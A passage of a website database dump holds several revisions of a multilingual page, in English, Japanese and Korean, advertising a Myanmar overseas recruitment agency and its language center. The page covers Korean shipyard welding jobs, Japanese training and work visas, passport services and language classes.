•&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 278, 'ko', 0, '<p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 279, 'en', 0, '<img data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" width=\"100%\" data-align=\"center\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, we provide services to facilitate employment opportunities , if necessary , we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 279, 'ja', 0, '<img data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 279, 'ko', 0, '<img data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" width=\"100%\" data-align=\"center\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 24, 301, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 301, 'ja', 0, '<img data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;車修理関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;工業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;建築業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;食品関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;レストラン<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;ホテル関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;衣類関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;農業関係<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;漁業関係の工場<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係 {Training Visa)</p><p>6.ドバイ、マレーシア、シンガポール、タインなどで働きたい学生達のためにも英語など必要な場合に応じて、パ &nbsp;ソコントレーニングでできない事がないように時間をかけて、良いネットワークで仕事のチャンスを掴むサビー &nbsp;スをしております。</p><p>7.上記のサービスをInternational Recruitment Integrity System(IRIS)が定めたEthical Recruitment and Fair Labour &nbsp;Practicesに合った基準で管理しております。<br>&nbsp;</p><p>ニューコメットトレンディング海外エージェンシーは、職場での言語要件を提供するためにHIT Language Centerを開設しました。</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_0.jpg\" data-entity-uuid=\"e886989a-4bfa-4f58-807c-d350f4453113\" data-entity-type=\"file\"><blockquote><p>HIT Language Centerからのお知らせ：</p></blockquote><p><br>・KOSHIPA SKILL TEST INTERVIEWで必要とされるビジネス表現を教える韓国語クラス。同じスキルを持っていてもコミュニケーションで優位に立つための授業です。<br>・基礎から日本語をマスターしたい方のための日本語クラス。<br>・特定ビザで日本に行きたい方々には、働き専用（トレーニングビザ）、介護（介護ビザ）、初心者/ITコンピューター学校卒業生などに関連するトレーニング校とのつながりを継続的に提供し、トレーニングクラスを提供しています。<br>・他の周辺都市で日本語の授業を受けたい方々には、バゴ、モーラミャイン、サガインといった他の共同語学学校との連携も行っております。</p>', '', 'full_html'),
('page', 0, 24, 301, 'ko', 0, '<img data-entity-uuid=\"e5deb7cf-45ee-4a4a-8dc7-90ebd6e964af\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_1.png\" width=\"100%\" data-align=\"center\"><p>1.&nbsp;&nbsp;&nbsp;&nbsp;한국 조선소에서 E-7-3 비자(용접공)로 일하고 싶은 미얀마 여러 지역에서 온 모든 노동자들을 인종과 종교의 차별 없이 교통통신부 산하 씬마락 (Sinmalike) 조선소에서 필요한 교육을 시키고 취업 기회를 제공함해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>2.&nbsp;&nbsp;&nbsp;&nbsp;외국에서 일할 때 직장에서 어려움을 겪지 않도록, 직장에 사용하는 기본 한국어,일본어,영어 등 교육시킴<br>3.&nbsp;&nbsp;&nbsp;&nbsp;해외 방문에 필요한 여권(PJ) 없는 분을 위한 여권 신청 서비스 제공<br>4.&nbsp;&nbsp;&nbsp;&nbsp;일본으로 연수비자 도쿠테이 기노( Tokutei Ginou) 비자로 취업을 희망하는 분들 위해 일본의 전통문화와 풍속을 익히도록 필요한 코스를 개설, 교육 시키고 취직을 연결<br>5.&nbsp;&nbsp;&nbsp;&nbsp;일본어 시험 N3, N2(JLPT, JFT, NAT-Test, Top J) 이상에 합격하는 분들이Work Visa 인<br>• 번역 직업<br>• IT 직업<br>• 엔지니어링 관련 직업(Civil, Mechanical, EP, EC, Auto CAD 등)<br>• 간호지원 직업으로 일본으로 가고 싶다면 해당 학당으로 연결<br>New Comet Trading Agency는 다음 사업체를 훈련 비자 (Training Visa)로 가고 싶은 젊은 형제 자매를 위해 서비스를 주선하고 있습니다.<br>• 자동차 수리 및 관련 직업<br>• 산업 직업<br>• 집 짓기 직업<br>• 식품 산업<br>• 쌀 상자 공장<br>• 매장 운영<br>• 호텔 비즈니스<br>• 의류 산업<br>• 건설 직업<br>• 농업 직업<br>• 물 제품, 어업 관련 공장<br>• 노인 돌봄 서비스 사업<br>6.&nbsp;&nbsp;&nbsp;&nbsp;두바이, 말레이시아, 싱가포르, 태국과 같은 국가에서 일하기를 원하는 사람들을 위해 기본 영어 과정과 필요하는 경우에 컴퓨터 교육과 같은 많은 과정들과 연결하고 취업 기회를 제공하는 서비스를 하고 있습니다.<br>7.&nbsp;&nbsp;&nbsp;&nbsp;상기 서비스들을 &nbsp;IRIS(International Recruitment Integrity System)에서 제정한 윤리적 채용 및 공정한 노동 관행의 기준에 따라 마련하고 제공합니다.</p><p>&nbsp;</p><p>New Comet Agency는 HIT Language Center를 개설하여 직장에서 필요한 언어교육을 제공합니다.</p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e_1.jpg\" data-entity-uuid=\"9da0938d-889d-4fb8-a66d-21c938aa7bee\" data-entity-type=\"file\"><blockquote><p><br>HIT 교육 센터에서는</p></blockquote><p><br>• KOSHIPA 기량검증 면접 시 도움되는 한국어 표현을 효율적으로 가르칩니다.<br>• 일본어를 기초부터 마스터하고 싶은 분을 위한 일본어 수업을 제공합니다.<br>• Tokutei Visa, Work-only (Training Visa), Elderly Care (Kaigo), Beginner / IT computer degree로 일본에 가고자 하는 분들을 위한 교육센터와 연계하여 필요한 기술을 습득하도록 합다.<br>• 일본어 코스를 수강하려는 타지역 사람들을 위해 Bago, Mawlamyine 및 Sagaing의 교육 기관과 연계하고 있습니다.</p>', '', 'full_html'),
('page', 0, 24, 302, 'en', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217.png\" data-align=\"center\" data-entity-uuid=\"242d95bb-8dd8-4539-b5f8-9308dfcbde3f\" data-entity-type=\"file\" width=\"100%\"><p>1. Providing necessary training to all citizens of Myanmar regardless of race and religion from various regions and states who want to work at the shipyards in Korea with an E 7-3 visa as a welder technician level at the Sinmalike Shipyard under the Ministry of Transport and Communications and connecting them with job opportunities.</p><p>&nbsp;2. Co-opening and teaching Korean, Japanese, and English basic language courses for work so that there are no difficulties in the workplace when traveling to foreign countries to work.&nbsp;</p><p>3. Providing Passport application service for those who do not have a Passport (PJ) required to travel to foreign countries.</p><p>&nbsp;4. For those who want to work in Japan with a Training Visa, Tokutei Ginou visa, we are opening and teaching the necessary courses to get familiar with Japan\'s traditional culture and customs, and connect with employment opportunities.&nbsp;</p><p>5. Those who pass the Japanese language test N3, N2 (JLPT, JFT, NAT-Test, Top J) and above, who have a Work Visa, we are connecting with related courses and services below:&nbsp;</p><p>• Translation services&nbsp;</p><p>• IT businesses&nbsp;</p><p>• Engineering related works (Civil, Mechanical, EP, EC, Auto CAD, etc)&nbsp;</p><p>• Nursing support activities&nbsp;</p><p>Those who want to work with a Training Visa, we are also providing services to following businesses:&nbsp;</p><p>• Car repair and related works</p><p>&nbsp;• Industrial works&nbsp;</p><p>• House building works&nbsp;</p><p>• Food industries&nbsp;</p><p>• Rice box factories&nbsp;</p><p>• Shop operations</p><p>• Hotel businesses</p><p>• Garment industries</p><p>&nbsp;• Construction works</p><p>&nbsp;• Agricultural works&nbsp;</p><p>• Water products; Fishery-related factories&nbsp;</p><p>• Elderly care services businesses&nbsp;</p><p>6. For those who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea and etc., we provide services to facilitate employment opportunities, if necessary, we connect with many courses such as computer training and basic English courses.&nbsp;</p><p>7. The above services are arranged and provided in accordance with the standards of Ethical Recruitment and Fair Labor Practices established by the International Recruitment Integrity System (IRIS)</p><p>&nbsp;</p><p>New Comet Agency has opened HIT Language Center to provide language requirement in the workplace.&nbsp;</p><p><img src=\"/sites/default/files/inline-images/0-02-06-e9c5d622098af0ccff154609f19ce04b9d2fb0e16661e09a7645c160e5cf8d9d_5737815cb1ce523e.jpg\" data-entity-uuid=\"6fde88f6-3208-43c8-b938-4945a6f778ae\" data-entity-type=\"file\" alt=\"\"><br>&nbsp;</p><blockquote><p>From the HIT Language Center</p></blockquote><p><br>• Korean Language Class that will teach business expressions needed in the KOSHIPA SKILL TEST INTERVIEW to give you an advantage in communication even if you have the same skills.<br>• Japanese Language Class for those who want to master the Japanese language from the basics<br>• For those who want to go to Japan with Tokutei Visa, Work-only (Training Visa), Elderly care (Kaigo), Beginner / IT computer degree, we are constantly connecting with training schools and providing training classes to make them full of talent.<br>• For those who want to take Japanese language courses in the other surrounded cities, we are connecting with other joint language schools in Bago, Mawlamyine, and Sagaing.&nbsp;</p>', '', 'full_html'),
('page', 0, 24, 302, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-26%20105217_0.png\" data-entity-uuid=\"d0f4e5f0-d3b4-4a71-a4f7-e4dfd02c6e4f\" data-entity-type=\"file\" width=\"100%\"><p>1. &nbsp;ニューコメットトレンディング海外エージェンシーでは韓国の造船所でE 7-3 Visaで働きたいミャンマー全国か &nbsp;ら民族問わず、シンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしてお り ます。<br>2. 海外に勤める際使えるそれぞれの国の言語が勉強できる学校も開いております。(現在日本語学校、韓国語学校)<br>3 .パスポート作成サービス<br>4. 日本に実習生、特定技能などで勤める学生達には言語だけでなく日本の習慣、文化なども授業の一部として、 &nbsp;取り込んでおります。<br>5. 日本語能力試験(JLPT, &nbsp;JFT, &nbsp;NAT-TEST, TOP-J)のN3,N2以上の合格者達にはワークビザである<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;通訳、翻訳<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;IT事業<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;エンジニアに関する事業 &nbsp;(Civil,Mechanical,EP,EC,Auto Cardなど)<br>&nbsp; •&nbsp;&nbsp;&nbsp;&nbsp;介護関係</p><p>&nbsp;実習生ビザなどに興味を持たれた学生達には下記　の仕事の紹介を行っております。</p><p>&nbsp; 